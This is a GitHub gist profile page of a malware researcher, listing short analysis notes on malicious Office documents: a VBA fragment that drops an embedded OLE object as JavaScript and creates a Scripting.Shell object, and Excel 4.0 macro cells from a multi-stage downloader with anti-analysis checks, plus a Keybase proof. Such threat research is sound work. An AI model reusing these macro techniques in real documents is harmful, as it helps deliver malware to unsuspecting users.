Skip to content

Instantly share code, notes, and snippets.

View miller-itsec's full-sized avatar
💦
Sweating

Jan Miller miller-itsec

💦
Sweating
12 followers · 3 following
View GitHub Profile
@miller-itsec
miller-itsec / copy-ole-maldoc.md
Created April 18, 2022 20:59
Copy OLE -> JS -> Powershell

3acc0848c4fa44af2f91688375bc200a40a36b7d2c567166f59625f69bb65751 from #579

  • copy an OLE Object and paste into Scripting.FolderItem, this will get a txt, rename it to js
    For Each Sh In Sheet1.OLEObjects
        If InStr(1, Sh.Name, "Object", 1) Then
            Sh.Copy
            ' this code paste Embedded Object to folder
 Set KjCQxE = GetObject("new:13709620-C279-11CE-A49E-444553540000") ' Scripting.Shell
@miller-itsec
miller-itsec / multi-stage-xlm.md
Created February 4, 2022 14:50
Multi-Stage XLM

This multi-stage XLM downloads the second stage payload, only if an internet connection is present. It contains anti-analysis tricks, such as checking the real sleep length and removes second stage origin artifacts, such as the zone identifier.

SHA-256: 5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a Report: https://www.filescan.io/uploads/61fd39b19046890c53adaa11/reports/f0412948-2f44-4ad2-ad51-31d347e9dd56/overview

  • Stage 1: the entrypoint stage, FORMULA(crack) is the key cell to creating the next stage.
C51	pound=(VALUE("0"))
C52	=WHILE(pound<30)
@miller-itsec
miller-itsec / keybase.md
Created April 10, 2019 12:31

Keybase proof

I hereby claim:

  • I am miller-itsec on github.
  • I am miller_itsec (https://keybase.io/miller_itsec) on keybase.
  • I have a public key whose fingerprint is 1702 4CDA 716B 5502 0CAB B288 5809 4FF4 6B0A BE22

To claim this, I am signing this object: